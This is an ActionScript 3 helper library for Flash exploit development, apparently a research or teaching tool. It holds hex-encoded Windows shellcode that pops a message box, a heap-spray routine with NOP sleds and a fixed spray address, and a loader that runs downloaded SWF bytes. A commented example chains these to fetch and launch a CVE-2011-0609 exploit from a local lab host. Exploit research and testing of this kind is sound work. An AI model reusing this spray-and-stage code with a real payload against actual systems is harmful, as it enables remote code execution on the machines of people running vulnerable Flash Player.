package { //see example usage at end of file import flash.display.*; import flash.system.*; import flash.text.*; import flash.utils.*; import flash.events.*; import flash.external.*; import flash.net.*; import flash.filesystem.*; import fl.controls.UIScrollBar; //Drag the Flex UIScrollBar component to the Library panel. import flash.errors.IOError; public class Helper{ private var version:String = "Helper.as version 0.2 - http://sandsprite.com"; public var myText:TextField; private var mySb:UIScrollBar = new UIScrollBar(); private var my_button:SimpleButton; private var buttonText:TextField; public var parentClass; static var allocs:Array; static var pool:ByteArray; public function Helper(p){ parentClass = p; createLogWindow(5, 5, 560, 380); } //public function download_callback(data:ByteArray, success:Boolean){ public function download(url:String, completeCallback) { var loader:URLLoader; onError = function(event:IOErrorEvent):void { xx("failed to download: " + event.text); completeCallback(null, false); } onLoadComplete = function (event:Event) : void { xx("download complete received " + loader.data.length.toString(16) + " bytes"); completeCallback(loader.data, true); } xx("Downloading " + url); loader = new URLLoader(); loader.dataFormat = URLLoaderDataFormat.BINARY; loader.addEventListener(Event.COMPLETE, onLoadComplete); loader.addEventListener(IOErrorEvent.IO_ERROR, onError); try{ loader.load(new URLRequest(url)); }catch(e){ xx("Error downloading file"); completeCallback(null, false); } } //public function file_loaded_callback(data:ByteArray, success:Boolean){ public function LoadFile(callback,x=5,y=5){ var fileRef:FileReference; createButton("Load File", button_click,x,y); onCancel = function (event:Event) : void { hideButton(); callback(null, false); } onFileSelected = function (event:Event) : void { fileRef.addEventListener(Event.COMPLETE, onFileLoaded); fileRef.load(); } onFileLoaded = function (event:Event) : void { var loader:Loader = new Loader(); xx("loaded local file size: " + event.target.data.length.toString(16)); hideButton(); callback(event.target.data, true); } function button_click(m:MouseEvent):void { //In Browser you can only call this method successfully in response to a user event fileRef = new FileReference(); fileRef.browse([new FileFilter("All Files", "*.*;")]); fileRef.addEventListener(Event.SELECT, onFileSelected); fileRef.addEventListener(Event.CANCEL, onCancel); } } //public function savefile_callback(success:Boolean){ public function Save2Disk(ba:ByteArray, optionalCallback = null,x:uint=5,y:uint=5){ var success:Boolean = true; createButton("Save Data", button_click,x,y); onCancel = function (event:Event) : void { hideButton(); if(optionalCallback) optionalCallback(false); } onComplete = function (event:Event) : void { hideButton(); if(optionalCallback) optionalCallback(true); } function button_click(m:MouseEvent):void { //in Browser you can only call this method successfully in response to a user event var fr:FileReference=new FileReference(); fr.addEventListener(Event.CANCEL, onCancel); fr.addEventListener(Event.COMPLETE, onComplete); fr.addEventListener(IOErrorEvent.IO_ERROR, onCancel); fr.save(ba,"xxx.bin"); //surprisingly ba variable is still valid here... } } public function GetMsgboxSc():ByteArray { var sc:ByteArray; var shex:String = "90FCE8890000006089E531D2648B52308B520C8B52148B72280FB74A2631FF" + "31C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0744A01D0508B48188B58"+ "2001D3E33C498B348B01D631FF31C0ACC1CF0D01C738E075F4037DF83B7D2475E2588B582401D3668B"+ "0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE0585F5A8B12EB865D8D85A70000006A006A"+ "00506A006845835607FFD56A0068F0B5A256FFD57368656C6C636F6465207375636365737366756C00"+ "909090"; sc = hexToBin(shex); //xx("GetMsgboxSc length: " + sc.length); return sc; } public function xx(x){ this.myText.text += x + "\n"; this.mySb.scrollTarget = this.myText; } public function hexdump(bytes:ByteArray, start:uint = 1, length:uint = 0 ):void { var output:String = ""; var charbuf:String = ""; if(start==0) start = 1; if(length > bytes.length || length == 0) length = bytes.length; bytes.position = start - 1; //0 based for (var i:int = start; i < length+1; i++) { var byte:int = bytes.readByte(); if( byte>20 && byte < 123 )charbuf+= String.fromCharCode(byte); else charbuf += "."; output += byte2hex(byte) + " "; if(i%16==0){ output += "\t" + charbuf + "\n"; charbuf = ""; } } if(i%16 != 0){ while(i%16!=0){output+=" ";i++;} output+=" " output += "\t" + charbuf + "\n"; } xx(output); //return output; } public function byte2hex(byte:uint):String { //http://www.actionscript.org/forums/showthread.php3?t=189952 var hex:String = ''; var arr:String = 'FEDCBA'; for(var i:uint = 0; i < 2; i++) { if(((byte & (0xF0 >> (i * 4))) >> (4 - (i * 4))) > 9){ hex += arr.charAt(15 - ((byte & (0xF0 >> (i * 4))) >> (4 - (i * 4)))); } else{ hex += String((byte & (0xF0 >> (i * 4))) >> (4 - (i * 4))); } } return hex; } public static function hexToBin(param1:String, endiness = Endian.LITTLE_ENDIAN) : ByteArray { var tmp:* = new ByteArray(); tmp.endian = endiness; var len:* = param1.length; var pos:uint = 0; while(pos < len) { var hex:* = param1.charAt(pos) + param1.charAt((pos + 1)); tmp.writeByte(parseInt(hex, 16)); pos = pos + 2; } return tmp; } public function loadSWF(ba:ByteArray){ var loader:* = new Loader(); var loaderContext:* = new LoaderContext(false); loader.loadBytes(ba, loaderContext); parentClass.addChild(loader); } public function heap_spray(sc:ByteArray, address:uint, prefixSize:uint=0, bufSize:uint=0, allocSize:uint=0, blocks:uint = 0){ var i:int; allocs = new Array(); var buf:* = new ByteArray(); var buf2:* = new ByteArray(); buf.endian = Endian.LITTLE_ENDIAN; if( prefixSize == 0) prefixSize = 5140 - 32; if( bufSize == 0 ) bufSize = 65536; if( allocSize==0 ) allocSize = 1048576 - 3840 - 36; if( blocks==0 ) blocks = 1280; for(i=0; i < prefixSize; i+=4) buf.writeInt(address); buf.writeInt(0x90909090); buf.writeInt(0x90909090); buf.writeBytes(sc); for(i=buf.length; i < bufSize; i+=4) buf.writeInt(address); init_pool(buf); buf2.writeBytes(pool, 0, allocSize); allocs.push(buf2); pool = null; for(i=0; i < blocks; i++){ var buf3:* = new ByteArray(); buf3.writeBytes( buf2, 0, allocSize); allocs.push( buf3); } } public static function init_pool(ba:ByteArray, size:uint = 0x100000) { pool = new ByteArray(); pool.writeBytes(ba); while (pool.length < size) { var tmp:* = new ByteArray(); tmp.writeBytes(pool); pool.writeBytes(tmp); } } public static function free(){ allocs = null; } public function hideLog(setting:Boolean = true){ myText.visible = setting; mySb.visible = setting; } public function hideButton(){my_button.visible = false; buttonText.visible = false;} public function createButton(caption,handler, x:uint=5, y:uint=5){ my_button = new SimpleButton(); //simple button w no caption or text property? simply bullshit... buttonText = new TextField(); my_button.x = x; my_button.y = y; my_button.upState = getButton(); my_button.overState = getButton(0xc9c9c9); my_button.downState = getButton(0x9c9c9c); my_button.hitTestState = my_button.upState; buttonText.x = my_button.x; buttonText.y = my_button.y+2; buttonText.width = my_button.width; buttonText.selectable = false buttonText.mouseEnabled = false; var Format:TextFormat = new TextFormat(); Format.font = "Arial"; Format.color = 0x000000; Format.size = 18; Format.bold = false; Format.align = TextFormatAlign.CENTER; buttonText.defaultTextFormat = Format; buttonText.text = caption; my_button.addEventListener(MouseEvent.CLICK, handler); this.parentClass.addChild(my_button); this.parentClass.addChild(buttonText) function getButton(color = 0xc0c0c0):Shape { var x:Shape=new Shape(); x.graphics.beginFill(color,1); x.graphics.drawRect(my_button.x,my_button.y,100,25); x.graphics.endFill(); return(x); } } private function createLogWindow(x:Number, y:Number, width:Number, height:Number):TextField { this.myText = new TextField(); this.myText.x = x; this.myText.y = y; this.myText.width = width; this.myText.height = height; this.myText.multiline = true; this.myText.selectable = true; this.myText.thickness = 3; this.myText.border = true this.myText.selectable = true; var format:TextFormat = new TextFormat(); format.font = "Courier"; format.size = 15; this.myText.defaultTextFormat = format; parentClass.addChild(this.myText); mySb.direction = "vertical"; mySb.move(this.myText.width + 5, this.myText.y); this.mySb.setSize(this.myText.width, this.myText.height); this.mySb.scrollTarget = this.myText; parentClass.addChild(mySb); } } } /* Example usage: package { import flash.display.*; import flash.system.*; import flash.text.*; import flash.utils.*; import flash.events.*; import flash.external.*; import flash.net.*; import flash.filesystem.*; public class Main extends MovieClip { public var swf:ByteArray; public var sc:ByteArray; var h:Helper = new Helper(this); public function exploitbutton_click(event):void{ h.hideButton(); ExploitManager(3);} public function Main() { h.xx("Starting..."); sc = h.GetMsgboxSc(); h.xx("Shellcode loaded size: " + sc.length.toString(16) ) ; ExploitManager(); } public function ExploitManager(step:uint=0){ //handle async events.. try{ switch(step){ case 0: h.xx("Downloading exploit swf file..") h.download("http://192.168.0.10/CVE-2011-0609_EXPLOIT/CVE_2011-0609.exploit", download_callback); break; case 1: h.xx("Starting heap spray"); h.heap_spray(sc, 0x14141414); h.xx("Press button to launch exploit...") h.createButton(" EXPLOIT!", exploitbutton_click); break; case 3: h.xx("Running exploit swf.."); h.loadSWF(swf); break; } }catch(err:Error){ h.xx("Caught error in ExploitManager step="+step+ " Message: " + err.message); } } public function download_callback(data:ByteArray, success:Boolean){ if(success){ h.xx("Download Size: " + data.length.toString(16)); h.hexdump(data,1,0x20) ; swf = data; //uncompress, convert from hexstring, xor, etc here... ExploitManager(1); }else{ h.xx("Download failed"); } } public function file_loaded(data:ByteArray, success:Boolean){ if(success){ h.xx("success"); h.xx("File Length: " + data.length.toString(16)); h.hexdump(data,1,0x20) ; }else{ h.xx("LoadFile failed"); } } public function savefile_callback(success:Boolean){ h.xx("SaveFile: " + success); } } } */